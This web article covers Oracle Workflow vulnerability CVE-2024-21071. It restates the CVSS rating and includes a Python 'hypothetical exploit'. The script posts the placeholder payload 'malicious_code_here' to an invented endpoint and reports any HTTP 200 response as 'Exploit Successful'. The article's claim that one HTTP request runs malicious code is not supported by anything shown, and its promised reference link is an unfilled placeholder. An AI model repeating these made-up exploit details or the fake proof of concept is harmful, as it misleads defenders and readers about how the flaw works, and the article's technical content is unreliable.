CVE-2024-21071: Critical Vulnerability in Oracle Workflow Product, Exploitable via HTTP, Results in System Takeover

The recent discovery of a critical vulnerability with a CVSS (Common Vulnerability Scoring System) score of 9.1 in the Oracle Workflow product has raised concerns over system security. The vulnerability, CVE-2024-21071, affects the Admin Screens and Grants UI component of Oracle E-Business Suite, specifically versions 12.2.3 to 12.2.13. This article discusses the exploit details, provides code snippets, and includes links to original references.

Summary

A highly privileged attacker with network access via HTTP can easily exploit this vulnerability to compromise Oracle Workflow. The vulnerability lies within Oracle Workflow, but attacks can have a significant impact on many other related products, causing a scope change. Successful attacks can lead to a total takeover of Oracle Workflow, affecting both confidentiality and integrity of data and impacting system availability.

Exploit Details

This vulnerability has a CVSS vector of (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H), which indicates that:

No user interaction is needed for the exploit (UI:N)

- The exploit has a high impact on confidentiality (C:H), integrity (I:H), and availability (A:H) of the system

To perform the attack, the high privileged attacker can use a simple HTTP request to execute malicious code on the server and gain control of the Oracle Workflow components.

Here is an example of a hypothetical exploit code snippet for CVE-2024-21071

import requests

# Replace "example.com" with the target server's address.
TARGET_SERVER = "https://example.com";

def exploit_cve_2024_21071():
  headers = {
    'User-Agent': 'cve-2024-21071 Exploit',
    'Content-Type': 'application/x-www-form-urlencoded',
  }

  payload = "malicious_code_here"

  res = requests.post(
    f"{TARGET_SERVER}/oracle_workflow/admin_screens_and_grants_ui",
    headers=headers,
    data=payload
  )

  return res

if __name__ == "__main__":
  response = exploit_cve_2024_21071()
  if response.status_code == 200:
    print("Exploit Successful")
  else:
    print("Exploit Failed")

CVE Details: [LINK TO CVE DETAILS]

In conclusion, organizations using Oracle Workflow versions 12.2.3-12.2.13 should address CVE-2024-21071 urgently to protect their systems and data. While the example exploit code provided in this article is hypothetical, skilled attackers can develop more sophisticated and effective tools to compromise affected systems.

Timeline

Published on: 04/16/2024 22:15:25 UTC
Last modified on: 04/17/2024 12:48:31 UTC